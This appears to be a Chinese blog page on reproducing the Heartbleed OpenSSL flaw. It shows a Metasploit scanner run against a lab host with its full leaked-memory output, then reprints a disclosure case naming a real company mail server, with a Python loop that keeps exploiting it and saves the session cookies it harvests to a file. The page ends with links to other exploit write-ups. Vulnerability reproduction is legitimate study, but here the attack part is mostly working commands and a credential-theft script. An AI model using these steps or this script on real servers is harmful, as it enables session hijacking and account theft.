漏洞分析的两篇文章

https://blog.csdn.net/javajiawei/article/details/82429886

https://xz.aliyun.com/t/1771

set verbose true 才能看到

msf5 > use auxiliary/scanner/ssl/openssl_heartbleed

msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set rhosts 172.16.20.134

rhosts => 172.16.20.134

msf5 auxiliary(scanner/ssl/openssl_heartbleed) > run

[*] 172.16.20.134:443     - Sending Client Hello...

[*] 172.16.20.134:443     - SSL record #1:

[*] 172.16.20.134:443     -     Type:    22

[*] 172.16.20.134:443     -     Version: 0x0301

[*] 172.16.20.134:443     -     Length:  86

[*] 172.16.20.134:443     -     Handshake #1:

[*] 172.16.20.134:443     -             Length: 82

[*] 172.16.20.134:443     -             Type:   Server Hello (2)

[*] 172.16.20.134:443     -             Server Hello Version:           0x0301

[*] 172.16.20.134:443     -             Server Hello random data:       5d7264f5d2c75e1260dc4814f823de44d904a502fd2edf425339c31c0fb7c13b

[*] 172.16.20.134:443     -             Server Hello Session ID length: 32

[*] 172.16.20.134:443     -             Server Hello Session ID:        cae101f7a275d73520601fcaacf8038a70e79f3b40c56163c8e4366c065db0af

[*] 172.16.20.134:443     - SSL record #2:

[*] 172.16.20.134:443     -     Type:    22

[*] 172.16.20.134:443     -     Version: 0x0301

[*] 172.16.20.134:443     -     Length:  909

[*] 172.16.20.134:443     -     Handshake #1:

[*] 172.16.20.134:443     -             Length: 905

[*] 172.16.20.134:443     -             Type:   Certificate Data (11)

[*] 172.16.20.134:443     -             Certificates length: 902

[*] 172.16.20.134:443     -             Data length: 905

[*] 172.16.20.134:443     -             Certificate #1:

[*] 172.16.20.134:443     -                     Certificate #1: Length: 899

[*] 172.16.20.134:443     -                     Certificate #1: #<OpenSSL::X509::Certificate: subject=#<OpenSSL::X509::Name:0xd58a318>, issuer=#<OpenSSL::X509::Name:0xd58a330>, serial=#<OpenSSL::BN:0xd58a348>, not_before=2019-09-06 10:42:27 UTC, not_after=2020-09-05 10:42:27 UTC>

[*] 172.16.20.134:443     - SSL record #3:

[*] 172.16.20.134:443     -     Type:    22

[*] 172.16.20.134:443     -     Version: 0x0301

[*] 172.16.20.134:443     -     Length:  331

[*] 172.16.20.134:443     -     Handshake #1:

[*] 172.16.20.134:443     -             Length: 327

[*] 172.16.20.134:443     -             Type:   Server Key Exchange (12)

[*] 172.16.20.134:443     - SSL record #4:

[*] 172.16.20.134:443     -     Type:    22

[*] 172.16.20.134:443     -     Version: 0x0301

[*] 172.16.20.134:443     -     Length:  4

[*] 172.16.20.134:443     -     Handshake #1:

[*] 172.16.20.134:443     -             Length: 0

[*] 172.16.20.134:443     -             Type:   Server Hello Done (14)

[*] 172.16.20.134:443     - Sending Heartbeat...

[*] 172.16.20.134:443     - Heartbeat response, 65535 bytes

[+] 172.16.20.134:443     - Heartbeat response with leak

[*] 172.16.20.134:443     - Printable info leaked:

......]q1......Im...j}Y...R&..HKm....r..f.....".!.9.8.........5.............................3.2.....E.D...../...A..................................................................................................................................... repeated 16008 times .....................................................................................................................................@..................................................................................................................................... repeated 16122 times .....................................................................................................................................@..........................................................................................................................................................................................................................................................................................................................................<.......<..............................................................................fE..............................a........2..................................................................................................................................... repeated 3708 times .....................................................................................................................................q........................................................................... ........u.5 `......p..;@.ac..6l.]......W...$..(..Kl.q...z..........................................................................,........dr]............................@.......................................................................................................................1.......2.......p;..........@...................1........V..WS..\.....J.%.!......].%..q.0.......1...............................................1..........)b....0.x......!.. ..4H....0.........1...............................................1...............................................!...............................!.........6.....jfx...&...~.....1.......................................0.......1...............................................1...............................................q...............................................................................................................a.........g......=......................p........................;..............................1.......Q%c.....................................1...............................................!........1......................A.........e..................... .................R.....@.......!...............................A.........e.......................................R.....p.......!....................... .......1.......<....0.y..._...u.%bw+s.y.U7.v_..........a.........g.....@........................................................................................<.......<.......................6.............. ....... .......................@....... ...............x6..............p.......................................................................................................................0.......x6..............................................................................................................................................................................................................................................................................A........6...... H......................................`.......`...............................................p.......................................................x6......@.......................#.....}s&5RW.f..4...w..g......K...2ms1...R.=.S.s.`{.EA.".N,......`...'._....8.;..z..k..Q....a..B..6..5.......................................sU..O}.\;.QFQ..T..z.2.........z..j.....h&D".4..z..%.K.&..........V.+|..`.?..UK!J..s.]....'.Z... .|Z....d...L...)Ie-........x6...............................6..............................................................................................................................................................................................................................................................................................................................................................................................A.......x6..................................................................................................................................... repeated 764 times .....................................................................................................................................1....... 4......`9..............................................................................................................................................................................................................................................................!................6..............0...............................................1.......Q%c.....................................!.........6.....jfx...&...~.....1........V..WS..\.....J.%.!......].%..q.........a.......x:..................................................................................................................................... repeated 252 times .....................................................................................................................................Q...............x6..................................................................................................................................... repeated 260 times .....................................................................................................................................1........6.......6......................`.......@...............................................................A...............................................................!.............]q1......Im...j}Y...R&..HKm....r..f.....".!.9.8.........5.............................3.2.....E.D...../...A..................................................................................................................................... repeated 5856 times .....................................................................................................................................@..................................................................................................................................... repeated 16103 times .....................................................................................................................................

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

乌云案例

详细说明:

code 区域

Fortinet邮箱服务器url:https://mail.fortinet.com.cn

存在漏洞的端口:443

该端口存在CVE-2014-0160即心脏滴血漏洞,每次可以读取服务器内存64 KB数据

首先是神器openssl.py测试信息:

code 区域

可以看到账户cookie,可以通过如下脚本,不断的抓cookie:

code 区域

import os

import re

import time

accounts = []

while True:

    result = os.popen('openssl.py mail.fortinet.com.cn').read()

    matches = re.findall('session1=(.*?);.*?OKIE=(Era.*?%3D%3D%0A)', result)

    for match in matches:

        if match not in accounts:

            accounts.append(match)

            with open('accounts.txt', 'a') as inFile:

                inFile.write(str(match) + '\n')

            print 'New Account:', match

    time.sleep(1.0)

抓了一小会就有三个:

漏洞证明:

修复方案:

补丁

HEARTBLEED 漏洞复现的更多相关文章

  1. [漏洞复现] [Vulhub靶机] OpenSSL Heartbleed Vulnerability (CVE-2014-0160)

    免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责. 0x00 背景知识 传输层安全协议SSL 安全套接字协议SSL(Secure Sockets Layer),及其继任者传输层安 ...

  2. heartbleed漏洞利用

    1.  heartbleed漏洞扫描: 2.  heartbleed漏洞利用: poc.py      117.52.93.111 貌似没有打到管理员账号密码,可能是管理员没登录,其实,可以写一个自动 ...

  3. ShadowBroker释放的NSA工具中Esteemaudit漏洞复现过程

    没有时间测试呢,朋友们都成功复现,放上网盘地址:https://github.com/x0rz/EQGRP 近日臭名昭著的方程式组织工具包再次被公开,TheShadowBrokers在steemit. ...

  4. 【S2-052】漏洞复现(CVE-2017-9805)

    一.漏洞描述 Struts2 的REST插件,如果带有XStream组件,那么在进行反序列化XML请求时,存在未对数据内容进行有效验证的安全隐患,可能发生远程命令执行. 二.受影响版本 Struts2 ...

  5. markdown反射型xss漏洞复现

    markdown xss漏洞复现 转载至橘子师傅:https://blog.orange.tw/2019/03/a-wormable-xss-on-hackmd.html 漏洞成因 最初是看到Hack ...

  6. WebLogic XMLDecoder反序列化漏洞复现

    WebLogic XMLDecoder反序列化漏洞复现 参考链接: https://bbs.ichunqiu.com/thread-31171-1-1.html git clone https://g ...

  7. Struts2-052 漏洞复现

    s2-052漏洞复现 参考链接: http://www.freebuf.com/vuls/147017.html http://www.freebuf.com/vuls/146718.html 漏洞描 ...

  8. Typecho反序列化导致前台 getshell 漏洞复现

    Typecho反序列化导致前台 getshell 漏洞复现 漏洞描述: Typecho是一款快速建博客的程序,外观简洁,应用广泛.这次的漏洞通过install.php安装程序页面的反序列化函数,造成了 ...

  9. Tomcat/7.0.81 远程代码执行漏洞复现

    Tomcat/7.0.81 远程代码执行漏洞复现 参考链接: http://www.freebuf.com/vuls/150203.html 漏洞描述: CVE-2017-12617 Apache T ...

随机推荐

  1. Scrapy爬虫框架基本使用

    scrapyhub上有些视频简单介绍scrapy如何学习的(貌似要FQ):https://helpdesk.scrapinghub.com/support/solutions/articles/220 ...

  2. Java 常用API(一)

    目录 Java 常用API(一) 1. Scanner类 引用类型的一般使用步骤 Scanner的使用步骤 例题 2. 匿名对象 概述 匿名对象作为方法的参数 匿名对象作为方法的返回值 3. Rand ...

  3. java读源码 之 map源码分析(HashMap,图解)一

    ​ 开篇之前,先说几句题外话,写博客也一年多了,一直没找到一种好的输出方式,博客质量其实也不高,很多时候都是赶着写出来的,最近也思考了很多,以后的博客也会更注重质量,同时也尽量写的不那么生硬,能让大家 ...

  4. Day_12【集合】扩展案例4_判断字符串每一个字符出现的次数

    分析以下需求,并用代码实现 1.利用键盘录入,输入一个字符串 2.统计该字符串中各个字符的数量(提示:字符不用排序) 3.如: 用户输入字符串 "If~you-want~to~change- ...

  5. java web程序员微信群

    关注微信公众号"程序员成长日志",回复关键字"java"扫码进群 本群主要为大家解决工作中遇到的问题遇到的问题发到群里大家集思广益平时可以瞎扯不定期红包

  6. bash初始化小建议

    bash有一些很好用但已经常被人忽略的小技巧,谨以此文记录下…… 1. 给history命令加上时间 history的命令很好用,他可以记录我们之前做了哪些操作,有了这些记录,我们可以很快捷的重复执行 ...

  7. Jetson AGX Xavier/Ubuntu安装SSD

    参考 https://blog.csdn.net/xingdou520/article/details/84309155 1. 查看硬盘所有分区 sudo fdisk -lu 会找到/dev/nvme ...

  8. JS插件:fullCalendar图解

    1.首先看下效果: 官网下载链接 https://fullcalendar.io/download .官方效果图:https://fullcalendar.io/ 2.准备工作,引入对应的 css和 ...

  9. wpf winform 截图

    wpf 通过下面的截图,标题可能会丢失. public void CreateBitmapFromVisual(Window win, string fileName)        {        ...

  10. MFC带参数启动指令发送与接收

    MFC带参数启动指令发送与接收 发送 使用ShellExecute函数打开文件或执行程序. 函数原型: HINSTANCE ShellExecute( _In_opt_ HWND hwnd,//父窗口 ...